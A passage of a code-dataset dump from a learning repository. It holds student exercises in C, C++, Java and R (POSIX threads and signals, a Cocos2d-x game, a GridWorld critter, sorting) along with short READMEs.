pthread_t thread;\n if 
(data->type == HAVA_PRODUCT_ID_TYPE) {\n pthread_create(&thread, NULL, produce, (void *)data);\n } else {\n pthread_create(&thread, NULL, consume, (void *)data);\n }\n}\n\nvoid print_test_data(test_data_type *data) {\n printf(\"|index:%10d|type:%c|begin_time:%10d|duration:%10d|product_id%10d|\\n\",\n data->index, data->type, data->begin_time, data->duration,\n data->product_id);\n}\n\nvoid line_buffer_to_test_data(char *line, test_data_type *data) {\n char *pch = strtok(line, KEY_STR);\n data->index = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->type = pch[0];\n pch = strtok(NULL, KEY_STR);\n data->begin_time = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->duration = atoi(pch);\n if (data->type == HAVA_PRODUCT_ID_TYPE) {\n pch = strtok(NULL, KEY_STR);\n data->product_id = atoi(pch);\n } else {\n data->product_id = 0;\n }\n}\n\nvoid read_file_work() {\n // malloc buffer\n char *line_buffer = (char *)malloc(sizeof(char) * LINE_BUFFER_SIZE);\n if (line_buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n // open file\n FILE *test_file = fopen(FILE_NAME, \"r\");\n if (test_file == NULL) {\n perror(\"File open failed\\n\");\n exit(-1);\n }\n // readfile and process\n while (fgets(line_buffer, LINE_BUFFER_SIZE, test_file) != NULL) {\n test_data_type *line_test_data =\n (test_data_type *)malloc(sizeof(test_data_type));\n line_buffer_to_test_data(line_buffer, line_test_data);\n#ifdef DEBUG_TAG\n print_test_data(line_test_data);\n#endif\n work_with_test_data(line_test_data);\n }\n // free malloc data\n free(line_buffer);\n // close file\n fclose(test_file);\n}" }, { "alpha_fraction": 0.5696682333946228, "alphanum_fraction": 0.593364953994751, "avg_line_length": 24.14285659790039, "blob_id": "8dbfb8db6b5feaf951608f9624b0bcc6528c95cb", "content_id": "33d387bfaa20e4a2a0dccfafb363d01656f12a27", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1291, "license_type": "permissive", "max_line_length": 
66, "num_lines": 42, "path": "/c/projects/POSIX/Lab1/2.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 编制一段程序,使用系统调用fork()创建两个子程序,再用系统调用signal()让父进程捕捉键盘上来的中断信号(即按Ctrl\n// C键),当捕捉到中断信号后,父进程调用kill()向两个子进程发出信号,子进程捕捉到信号后,分别输出下面信息后终止:\n// child process 1 is killed by parent!\n// child process 2 is killed by parent!\n// 父进程等待两个子进程终止后,输出以下信息后终止:\n// parent process is killed!\n\n#include <signal.h> // for signal()\n#include <stdio.h> // for puts()\n#include <stdlib.h> // for exit()\n#include <unistd.h> // for fork()\n\nint pid_1, pid_2;\n\nvoid process_signal(int sign_num) {\n // printf(\"%d %d \\n\", pid_1, pid_2);\n if (pid_1 > 0 && pid_2 > 0) {\n // int kill(pid_t pid, int sig);\n kill(pid_1, SIGINT);\n kill(pid_2, SIGINT);\n // pid_t wait(int *wstatus);\n while ((wait(NULL))!= -1)\n ;\n puts(\"parent process is killed!\\n\");\n exit(0);\n } else if (pid_1 == 0) {\n puts(\"child process 1 is killed by parent!\\n\");\n exit(0);\n } else if (pid_2 == 0) {\n puts(\"child process 2 is killed by parent!\\n\");\n exit(0);\n }\n}\n\nint main() {\n signal(SIGINT, process_signal);\n if ((pid_1 = fork())) {\n pid_2 = fork();\n }\n while (1)\n ;\n}" }, { "alpha_fraction": 0.4025973975658417, "alphanum_fraction": 0.4350649416446686, "avg_line_length": 18.3125, "blob_id": "7258efb71f01359405b0b1fbf64811a00b21bdff", "content_id": "4eed7e40e8a5bb47d941b9ed0b8cd2c64cb6cd75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 308, "license_type": "permissive", "max_line_length": 42, "num_lines": 16, "path": "/java/projects/algorithms/chapter1/part1/Q34.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q34\n */\npublic class Q34 {\n public static void main(String[] args) {\n // about the size program use\n // max min : O(1)\n // mean : O(N)\n // Kth : O(1)\n // sum n^2 : O(1)\n // mean : O(1)\n // > mean : O(N)\n // sort : O(N)\n // random : O(1) not vary random\n 
}\n}" }, { "alpha_fraction": 0.6521984934806824, "alphanum_fraction": 0.675483226776123, "avg_line_length": 25.64759063720703, "blob_id": "8abc74d8b6aa90dff1c5b46ef191f3075fc8e517", "content_id": "f51a6e27235dc1a9b8ed73327080af07f485ff0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9363, "license_type": "permissive", "max_line_length": 125, "num_lines": 332, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week13/Classes/Thunder.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#include \"Thunder.h\"\n#include <algorithm>\n\nUSING_NS_CC;\n\nusing namespace CocosDenshion;\n\nScene* Thunder::createScene() {\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = Thunder::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\nbool Thunder::init() {\n\tif (!Layer::init()) {\n\t\treturn false;\n\t}\n\n\tisMove = false; // 是否点击飞船\n\tvisibleSize = Director::getInstance()->getVisibleSize();\n\n\t// 创建背景\n\tauto bgsprite = Sprite::create(\"bg.jpg\");\n\tbgsprite->setPosition(visibleSize / 2);\n\tbgsprite->setScale(visibleSize.width / bgsprite->getContentSize().width,\n\t\tvisibleSize.height / bgsprite->getContentSize().height);\n\tthis->addChild(bgsprite, 0);\n\n\t// 创建飞船\n\tplayer = Sprite::create(\"player.png\");\n\tplayer->setAnchorPoint(Vec2(0.5, 0.5));\n\tplayer->setPosition(visibleSize.width / 2, player->getContentSize().height);\n\tplayer->setName(\"player\");\n\tthis->addChild(player, 1);\n\n\t// 显示陨石和子弹数量\n\tenemysNum = Label::createWithTTF(\"enemys: 0\", \"fonts/arial.TTF\", 20);\n\tenemysNum->setColor(Color3B(255, 255, 255));\n\tenemysNum->setPosition(50, 60);\n\tthis->addChild(enemysNum, 3);\n\tbulletsNum = Label::createWithTTF(\"bullets: 0\", \"fonts/arial.TTF\", 20);\n\tbulletsNum->setColor(Color3B(255, 255, 
255));\n\tbulletsNum->setPosition(50, 30);\n\tthis->addChild(bulletsNum, 3);\n\n\taddEnemy(5); // 初始化陨石\n\tpreloadMusic(); // 预加载音乐\n\tplayBgm(); // 播放背景音乐\n\texplosion(); // 创建爆炸帧动画\n\n\t// 添加监听器\n\taddTouchListener();\n\taddKeyboardListener();\n\taddCustomListener();\n\n\t// 调度器\n\tschedule(schedule_selector(Thunder::update), 0.04f, kRepeatForever, 0);\n\treturn true;\n}\n\n//预加载音乐文件\nvoid Thunder::preloadMusic() {\n\tauto audio = SimpleAudioEngine::getInstance();\n\n\taudio->preloadBackgroundMusic(\"music/bgm.mp3\");\n\taudio->preloadEffect(\"music/explore.wav\");\n\taudio->preloadEffect(\"music/fire.wav\");\n}\n\n//播放背景音乐\nvoid Thunder::playBgm() {\n\tSimpleAudioEngine::getInstance()->playBackgroundMusic(\"music/bgm.mp3\", true);\n}\n\n//初始化陨石\nvoid Thunder::addEnemy(int n) {\n\tenemys.clear();\n\tfor (unsigned i = 0; i < 3; ++i) {\n\t\tchar enemyPath[20];\n\t\tsprintf(enemyPath, \"stone%d.png\", 3 - i);\n\t\tdouble width = visibleSize.width / (n + 1.0),\n\t\t\theight = visibleSize.height - (50 * (i + 1));\n\t\tfor (int j = 0; j < n; ++j) {\n\t\t\tauto enemy = Sprite::create(enemyPath);\n\t\t\tenemy->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tenemy->setScale(0.5, 0.5);\n\t\t\tenemy->setPosition(width * (j + 1), height);\n\t\t\tenemys.push_back(enemy);\n\t\t\taddChild(enemy, 1);\n\t\t}\n\t}\n}\n\n// 陨石向下移动并生成新的一行(加分项)\nvoid Thunder::newEnemy() {\n\tfor (Sprite* s : enemys) {\n\t\tif (s != NULL) {\n\t\t\ts->setPosition(s->getPosition() + Vec2(0, -50));\n\t\t}\n\t}\n\n\tint n = 5;\n\tstatic int j;\n\tfor (unsigned i = 0; i < 1; ++i) {\n\t\tchar enemyPath[20];\n\t\tsprintf(enemyPath, \"stone%d.png\", j % 3 + 1);\n\t\tj++;\n\t\tdouble width = visibleSize.width / (n + 1.0),\n\t\t\theight = visibleSize.height - (50 * (i + 1));\n\t\tfor (int j = 0; j < n; ++j) {\n\t\t\tauto enemy = Sprite::create(enemyPath);\n\t\t\tenemy->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tenemy->setScale(0.5, 0.5);\n\t\t\tenemy->setPosition(width * (j + 1) - 80, 
height);\n\t\t\tenemys.push_back(enemy);\n\t\t\taddChild(enemy, 1);\n\t\t}\n\t}\n}\n\n// 移动飞船\nvoid Thunder::movePlane(char c) {\n\tint x = (c == 'A' ? -1 : 1) * 8;\n\tplayer->setPosition(player->getPosition() + Vec2(x, 0));\n}\n\n//发射子弹\nvoid Thunder::fire() {\n\tauto bullet = Sprite::create(\"bullet.png\");\n\tbullet->setAnchorPoint(Vec2(0.5, 0.5));\n\tbullets.push_back(bullet);\n\tbullet->setPosition(player->getPosition());\n\taddChild(bullet, 1);\n\tSimpleAudioEngine::getInstance()->playEffect(\"music/fire.wav\", false);\n\n\t// 移除飞出屏幕外的子弹\n\tauto seq = Sequence::create(MoveBy::create(1.0f, Vec2(0, visibleSize.height)),\n\t\tCallFunc::create([&, bullet]() {bullets.remove(bullet); }),\n\t\tnullptr);\n\n\tbullet->runAction(seq);\n}\n\n// 切割爆炸动画帧\nvoid Thunder::explosion() {\n\tauto texture = Director::getInstance()->getTextureCache()->addImage(\"explosion.png\");\n\texplore.reserve(8);\n\tfor (int i = 0; i < 8; i++)\n\t{\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(188.8 * i, (i / 6) * 160, 188.8, 160)));\n\t\texplore.pushBack(frame);\n\t}\n}\n\nvoid Thunder::update(float f) {\n\t// 实时更新页面内陨石和子弹数量(不得删除)\n\t// 要求数量显示正确(加分项)\n\tchar str[15];\n\tsprintf(str, \"enemys: %d\", enemys.size());\n\tenemysNum->setString(str);\n\tsprintf(str, \"bullets: %d\", bullets.size());\n\tbulletsNum->setString(str);\n\n\t// 飞船移动\n\tif (isMove)\n\t\tthis->movePlane(movekey);\n\n\tstatic int ct = 0;\n\tstatic int dir = 4;\n\t++ct;\n\tif (ct == 120)\n\t\tct = 40, dir = -dir;\n\telse if (ct == 80) {\n\t\tdir = -dir;\n\t\tnewEnemy(); // 陨石向下移动并生成新的一行(加分项)\n\t}\n\telse if (ct == 20)\n\t\tct = 40, dir = -dir;\n\n\t//陨石左右移动\n\tfor (Sprite* s : enemys) {\n\t\tif (s != NULL) {\n\t\t\ts->setPosition(s->getPosition() + Vec2(dir, 0));\n\t\t}\n\t}\n\n\t// 分发自定义事件\n\tEventCustom e(\"meet\");\n\t_eventDispatcher->dispatchEvent(&e);\n}\n\n// 自定义碰撞事件\nvoid Thunder::meet(EventCustom * event) {\n\t// 判断子弹是否打中陨石并执行对 应操作\n\tfor each (auto it1 in 
bullets)\n\t{\n\t\tbool hasBoom = false;\n\n\t\tfor each (auto it2 in enemys)\n\t\t{\n\t\t\tif (!hasBoom)\n\t\t\t{\n\t\t\t\tif (it1->getPosition().getDistance((it2->getPosition())) < 25)\n\t\t\t\t{\n\t\t\t\t\tit2->runAction(Sequence::create(\n\t\t\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\t\t\tCallFunc::create([it2] {it2->removeFromParentAndCleanup(true); }),\n\t\t\t\t\t\tCallFunc::create([&, it2] {enemys.remove(it2); }),\n\t\t\t\t\t\tNULL));\n\t\t\t\t\tit1->runAction(Sequence::create(\n\t\t\t\t\t\tFadeOut::create(0.02f),\n\t\t\t\t\t\tCallFunc::create([it1] {it1->removeFromParentAndCleanup(true); }),\n\t\t\t\t\t\tCallFunc::create([&, it1] {bullets.remove(it1); }),\n\t\t\t\t\t\tNULL));\n\n\t\t\t\t\tSimpleAudioEngine::getInstance()->playEffect(\"music/explore.wav\", false);\n\t\t\t\t\thasBoom = true;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\t// 判断游戏是否结束并执行对应操作\n\tfor each (auto it2 in enemys)\n\t{\n\t\tif (player->getPositionY() > it2->getPositionY() - 50)\n\t\t{\n\t\t\tSimpleAudioEngine::getInstance()->pauseBackgroundMusic();\n\n\t\t\t_eventDispatcher->removeAllEventListeners();\n\t\t\tunschedule(schedule_selector(Thunder::update));\n\n\t\t\tplayer->runAction(Sequence::create(\n\t\t\t\tAnimate::create(Animation::createWithSpriteFrames(explore, 0.05f, 1)),\n\t\t\t\tCallFunc::create([&] {player->removeFromParentAndCleanup(true); }),\n\t\t\t\tNULL));\n\t\t\tSimpleAudioEngine::getInstance()->playEffect(\"music/explore.wav\", false);\n\n\t\t\tauto gameover = Sprite::create(\"gameOver.png\");\n\t\t\tgameover->setAnchorPoint(Vec2(0.5, 0.5));\n\t\t\tgameover->setPosition(visibleSize.width / 2,\n\t\t\t\tvisibleSize.height / 2 - gameover->getContentSize().height);\n\t\t\tgameover->setName(\"player\");\n\t\t\tthis->addChild(gameover, 1);\n\t\t}\n\t}\n}\n\n// 添加自定义监听器\nvoid Thunder::addCustomListener() {\n\tauto meetListener = 
EventListenerCustom::create(\"meet\", CC_CALLBACK_1(Thunder::meet, this));\n\t_eventDispatcher->addEventListenerWithFixedPriority(meetListener, 1);\n}\n\n// 添加键盘事件监听器\nvoid Thunder::addKeyboardListener() {\n\tauto keyboardListener = EventListenerKeyboard::create();\n\tkeyboardListener->onKeyPressed = CC_CALLBACK_2(Thunder::onKeyPressed, this);\n\tkeyboardListener->onKeyReleased = CC_CALLBACK_2(Thunder::onKeyReleased, this);\n\n\t_eventDispatcher->addEventListenerWithFixedPriority(keyboardListener, 1);\n}\n\nvoid Thunder::onKeyPressed(EventKeyboard::KeyCode code, Event* event) {\n\tswitch (code) {\n\tcase EventKeyboard::KeyCode::KEY_LEFT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_A:\n\tcase EventKeyboard::KeyCode::KEY_A:\n\t\tmovekey = 'A';\n\t\tisMove = true;\n\t\tbreak;\n\tcase EventKeyboard::KeyCode::KEY_RIGHT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_D:\n\tcase EventKeyboard::KeyCode::KEY_D:\n\t\tmovekey = 'D';\n\t\tisMove = true;\n\t\tbreak;\n\tcase EventKeyboard::KeyCode::KEY_SPACE:\n\t\tfire();\n\t\tbreak;\n\t}\n}\n\nvoid Thunder::onKeyReleased(EventKeyboard::KeyCode code, Event* event) {\n\tswitch (code) {\n\tcase EventKeyboard::KeyCode::KEY_LEFT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_A:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_A:\n\tcase EventKeyboard::KeyCode::KEY_RIGHT_ARROW:\n\tcase EventKeyboard::KeyCode::KEY_D:\n\tcase EventKeyboard::KeyCode::KEY_CAPITAL_D:\n\t\tisMove = false;\n\t\tbreak;\n\t}\n}\n\n// 添加触摸事件监听器\nvoid Thunder::addTouchListener() {\n\tauto touchListener = EventListenerTouchOneByOne::create();\n\ttouchListener->onTouchBegan = CC_CALLBACK_2(Thunder::onTouchBegan, this);\n\ttouchListener->onTouchEnded = CC_CALLBACK_2(Thunder::onTouchEnded, this);\n\ttouchListener->onTouchMoved = CC_CALLBACK_2(Thunder::onTouchMoved, this);\n\n\t_eventDispatcher->addEventListenerWithFixedPriority(touchListener, 1);\n}\n\nbool Thunder::onTouchBegan(Touch *touch, Event *event) {\n\tfire();\n\tisClick = true;\n\treturn true;\n}\n\nvoid 
Thunder::onTouchEnded(Touch *touch, Event *event) {\n\tisClick = false;\n}\n\n// 当鼠标按住飞船后可控制飞船移动 (加分项)\nvoid Thunder::onTouchMoved(Touch *touch, Event *event) {\n\tif (isClick && player->getBoundingBox().containsPoint(touch->getLocation()))\n\t{\n\t\tplayer->setPosition(touch->getLocation());\n\t}\n}\n" }, { "alpha_fraction": 0.3736951947212219, "alphanum_fraction": 0.43110647797584534, "avg_line_length": 17.784313201904297, "blob_id": "e8492c5b26baefb28c3cae148d16b2c16baa78ba", "content_id": "14df9e5982a933a7875693ad7d44c1d13b7a0893", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 958, "license_type": "permissive", "max_line_length": 75, "num_lines": 51, "path": "/c/hardwork/hardway/5.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\nchar a[505][30];\n\nint strcmp2(const char *str1, const char *str2) {\n char ch1, ch2;\n while (*str1 == *str2 || abs(*str1 - *str2) == 32) {\n if (*str1 == '\\0') return 0;\n str1++;\n str2++;\n }\n if (*str1 < 'Z')\n ch1 = *str1 + 32;\n else\n ch1 = *str1;\n if (*str2 < 'Z')\n ch2 = *str2 + 32;\n else\n ch2 = *str2;\n\n return ch1 - ch2;\n}\n\nvoid sort(int n) {\n char temp[30];\n for (int i = 0; i < n - 1; i++) {\n for (int j = 0; j < n - 1; j++) {\n if (strcmp2(a[j], a[j + 1]) > 0) {\n strcpy(temp, a[j]);\n strcpy(a[j], a[j + 1]);\n strcpy(a[j + 1], temp);\n }\n }\n }\n}\nint main() {\n int N;\n scanf(\"%d\", &N);\n for (int i = 0; i < N; i++) {\n scanf(\"%s\", a[i]);\n }\n sort(N);\n for (int i = 0; i < N; i++) {\n if (abs(strcmp(a[i], a[i + 1])) == 32 || strcmp(a[i], a[i + 1]) == 0) {\n continue;\n } else\n printf(\"%s\\n\", a[i]);\n }\n}\n" }, { "alpha_fraction": 0.5372999310493469, "alphanum_fraction": 0.5493808388710022, "avg_line_length": 27.791303634643555, "blob_id": "36d98979cad82ba2f54fe7bb16621db00aab711e", "content_id": "c214a7cd593d93501646d400904bdbc399df8842", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3311, "license_type": "permissive", "max_line_length": 79, "num_lines": 115, "path": "/java/projects/gridworld/Part4/BlusterCritter/src/BlusterCritter.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/* \n * AP(r) Computer Science GridWorld Case Study:\n * Copyright(c) 2005-2006 Cay S. Horstmann (http://horstmann.com)\n *\n * This code is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation.\n *\n * This code is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n * \n * @author Chris Nevison\n * @author Barbara Cloud Wells\n * @author Cay Horstmann\n */\n\nimport info.gridworld.actor.Actor;\nimport info.gridworld.actor.Critter;\nimport info.gridworld.grid.Location;\n\nimport java.awt.Color;\nimport java.util.ArrayList;\n\n/**\n * A <code>BlusterCritter</code> takes on the color of neighboring actors as\n * it moves through the grid. <br />\n * The implementation of this class is testable on the AP CS A and AB exams.\n */\npublic class BlusterCritter extends Critter\n{\n\n private int courage;\n private final double DARKENING_FACTOR = 0.05;\n\n public BlusterCritter(int courage)\n {\n this.courage = courage;\n }\n\n\n /**\n * Gets the actors for processing. Implemented to return the actors that\n * occupy neighboring grid locations. 
Override this method in subclasses to\n * look elsewhere for actors to process.<br />\n * Postcondition: The state of all actors is unchanged.\n * @return a list of actors that this critter wishes to process.\n */\n public ArrayList<Actor> getActors()\n {\n \n ArrayList<Actor> Ans = new ArrayList<Actor>();\n int row = getLocation().getRow();\n int column = getLocation().getCol();\n\n for (int i = row - 2; i <= row + 2; i ++)\n {\n for (int j = row - 2; j <= column + 2; j++)\n {\n if (i == row && j == column)\n {\n continue;\n }\n\n Location tempLoc = new Location(i, j);\n if (getGrid().isValid(tempLoc))\n {\n Actor tempActor = getGrid().get(tempLoc);\n if (tempActor != null)\n {\n Ans.add(tempActor); \n }\n }\n \n }\n }\n return Ans;\n }\n\n\n\n /**\n * Randomly selects a neighbor and changes this critter's color to be the\n * same as that neighbor's. If there are no neighbors, no action is taken.\n */\n public void processActors(ArrayList<Actor> actors)\n {\n\n int size = 0;\n for (Actor a : actors)\n {\n if ((a instanceof Critter))\n size++;\n }\n\n Color c = getColor();\n int red = c.getRed();\n int green = c.getGreen();\n int blue =c.getBlue();\n if (courage <= size) \n {\n red = (int) (red * (1 - DARKENING_FACTOR));\n green = (int) (green * (1 - DARKENING_FACTOR ));\n blue = (int) (blue * (1 - DARKENING_FACTOR ));\n } \n else \n {\n red = red < 255 ? red+1 : 255;\n green = green < 255 ? green+1 : 255;\n blue = blue < 255 ? 
blue+1 : 255;\n }\n setColor(new Color(red, green, blue));\n }\n}\n" }, { "alpha_fraction": 0.6006884574890137, "alphanum_fraction": 0.6299483776092529, "avg_line_length": 15.166666984558105, "blob_id": "75a65c1bce7aa7bc6e7ba2b16596381ff8bdf374", "content_id": "3dd1eded2f5fb986c91d9c79020235f39ef38986", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 581, "license_type": "permissive", "max_line_length": 69, "num_lines": 36, "path": "/R/harwork/hardway/datatype.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Data type in R\n\n# basic data type\nv <- 2L\nprint(class(v));\nv <- 12.3;\nprint(class(v));\nv <- TRUE;\nprint(class(v));\nv <- \"hello\"\nprint(class(v));\nv <- charToRaw(\"hello\")\nprint(class(v));\n\n# use basic to construct high-level\n\n# vector\ncolors <- c(\"red\", \"green\", \"yello\")\nprint(colors)\nprint(class(colors))\n\n# list\ndocument <- list(colors, \"my colors\")\nprint(document)\nprint(class(document))\n\n# matrix\nmatrix <- matrix(c(11, 12, 21, 22), nrow = 2, ncol = 2, byrow = TRUE)\nprint(matrix)\n\n# array \narray <- array(c(\"green\", \"yellow\"), dim = c(3, 3, 2))\nprint(array)\n\n# factor\n# frame" }, { "alpha_fraction": 0.5599415302276611, "alphanum_fraction": 0.5678362846374512, "avg_line_length": 23.78985595703125, "blob_id": "e19344f1b4d96907b5ddb06b233e17691c5ca279", "content_id": "086273db30b2be69bde1761738642dcbf91585a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3420, "license_type": "permissive", "max_line_length": 79, "num_lines": 138, "path": "/c/projects/POSIX/Lab2/2.2.matrix.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <assert.h> // for assert()\n#include <pthread.h> // for pthread_*\n#include <stdio.h> // for printf(),fopen(), fgets()\n#include <stdlib.h> // for atoi(), malloc(), free()\n#include <string.h> // for memset()\n\n#define 
MATRIX_MAX_SIZE 1000\n#define BUFFER_SIZE (4 * MATRIX_MAX_SIZE)\n#define DATA_FILE_NAME \"2.2.data.csv\"\n#define KEY_STR \",\"\n\n// don't need test now\n// #define READ_TEST 1\n#define ANS_TEST 1\n\n// argument struct type\nstruct ARGU {\n int row;\n int column;\n int ans;\n};\n\ntypedef struct ARGU ARGU_TYPE;\n\n// global data\nint A[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE], B[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE];\nint A_row, A_B, B_column;\n\nvoid read_file();\nvoid *calcute(void *);\n\nint main() {\n read_file();\n void *return_value; // actually no use\n int ans[MATRIX_MAX_SIZE][MATRIX_MAX_SIZE];\n ARGU_TYPE argu;\n\n for (argu.row = 0; argu.row < A_row; argu.row++) {\n for (argu.column = 0; argu.column < B_column; argu.column++) {\n // produce every thread\n pthread_t thread;\n pthread_attr_t attr;\n pthread_attr_init(&attr);\n assert(0 == pthread_create(&thread, &attr, calcute, &argu));\n pthread_join(thread, &return_value);\n ans[argu.row][argu.column] = argu.ans;\n }\n }\n\n#ifdef ANS_TEST\n // print ans in csv format\n printf(\"%d,%d\\n\", A_row, B_column);\n for (argu.row = 0; argu.row < A_row; argu.row++) {\n for (argu.column = 0; argu.column < B_column; argu.column++) {\n printf(\"%d\", ans[argu.row][argu.column]);\n if (argu.column < B_column - 1) printf(\",\");\n }\n printf(\"\\n\");\n }\n#endif\n\n return 0;\n}\n\nvoid *calcute(void *argu) {\n // just calcute each value\n ARGU_TYPE *data_p = (ARGU_TYPE *)argu;\n data_p->ans = 0;\n for (int i = 0; i < A_B; i++) {\n data_p->ans += A[data_p->row][i] * B[i][data_p->column];\n }\n // test to use return value\n return (void *)1;\n}\n\nvoid read_file() {\n // read file part is a little long for the csv file format\n // you can use define to let it print read result to check it\n char *line, *buffer = malloc(sizeof(char) * BUFFER_SIZE);\n if (buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n\n FILE *data = fopen(DATA_FILE_NAME, \"r\");\n if (data == NULL) {\n perror(\"File open failed\\n\");\n 
exit(-1);\n }\n\n // read A_row, A_B, B_column\n if ((line = fgets(buffer, BUFFER_SIZE, data)) != NULL) {\n char *pch = strtok(buffer, KEY_STR);\n A_row = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n A_B = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n B_column = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d,%d,%d\\n\", A_row, A_B, B_column);\n#endif\n }\n\n // read matrix A\n for (int i = 0;\n ((i < A_row) && (line = fgets(buffer, BUFFER_SIZE, data)) != NULL);\n i++) {\n char *pch = strtok(buffer, KEY_STR);\n for (int j = 0; pch != NULL; j++) {\n A[i][j] = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d\", A[i][j]);\n if (j < A_B - 1) printf(\",\");\n#endif\n pch = strtok(NULL, KEY_STR);\n }\n#ifdef READ_TEST\n printf(\"\\n\");\n#endif\n }\n // read matrix B\n for (int i = 0;\n ((i < A_B) && (line = fgets(buffer, BUFFER_SIZE, data)) != NULL); i++) {\n char *pch = strtok(buffer, KEY_STR);\n for (int j = 0; pch != NULL; j++) {\n B[i][j] = atoi(pch);\n#ifdef READ_TEST\n printf(\"%d\", B[i][j]);\n if (j < B_column - 1) printf(\",\");\n#endif\n pch = strtok(NULL, KEY_STR);\n }\n#ifdef READ_TEST\n printf(\"\\n\");\n#endif\n }\n free(buffer);\n}" }, { "alpha_fraction": 0.7689393758773804, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 32.125, "blob_id": "ef23caaf967c78e695e93fe39cb27336a4cd4883", "content_id": "a3141c50b742f30d45b252a8e96453c9feac9e84", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 536, "license_type": "permissive", "max_line_length": 166, "num_lines": 8, "path": "/c/projects/MPI/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# 消息传递接口\n`jskyzero` `2017/09/06`\n\n> 消息传递界面/接口(英语:Message Passing Interface,缩写MPI)是一个跨语言的通讯协议,用于编写并行计算机。支持点对点和广播。MPI是一个信息传递应用程序接口,包括协议和和语义说明,他们指明其如何在各种实现中发挥其特性。MPI的目标是高性能,大规模性,和可移植性。MPI在今天仍为高性能计算的主要模型。\n\n## Reference\n\n[MPI 编程实训](http://www.easyhpc.org/lab/detail/5/)" }, { "alpha_fraction": 0.7910447716712952, 
"alphanum_fraction": 0.8208954930305481, "avg_line_length": 21.66666603088379, "blob_id": "9bfc54dbf07bd07e3ca4ced1c5798f871d675c24", "content_id": "1ae344ccb75dedee4546d5bbd319a2d7c9178459", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "permissive", "max_line_length": 41, "num_lines": 3, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# cocos2dx learning code\n\nThis is some learning code about cocos2dx" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7440000176429749, "avg_line_length": 20, "blob_id": "b3894510ccee8646c8b767321a16323dbea87d91", "content_id": "b90f706e7972093cd89dd0d27bbd129c93aa109b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "permissive", "max_line_length": 80, "num_lines": 6, "path": "/c/projects/socket/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# C-Study\n> socket programing\n\n\n## Reference\n[Sockets Tutorial](http://www.cs.rpi.edu/~moorthy/Courses/os98/Pgms/socket.html)" }, { "alpha_fraction": 0.7259231805801392, "alphanum_fraction": 0.7359833121299744, "avg_line_length": 64.21600341796875, "blob_id": "cc0917304a6a2866e8ce9434f6c6bce6c4fa70fc", "content_id": "fe821f1a0afe8a8c07cec89ff0c4ef94c0113bb1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8152, "license_type": "permissive", "max_line_length": 365, "num_lines": 125, "path": "/java/docs/GoogleStyleNaming.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## Naming Style\n\n### 1 Rules common to all identifiers[![img](https://google.github.io/styleguide/include/link.png)](https://google.github.io/styleguide/javaguide.html#s5.1-identifier-names)\n\nIdentifiers use only 
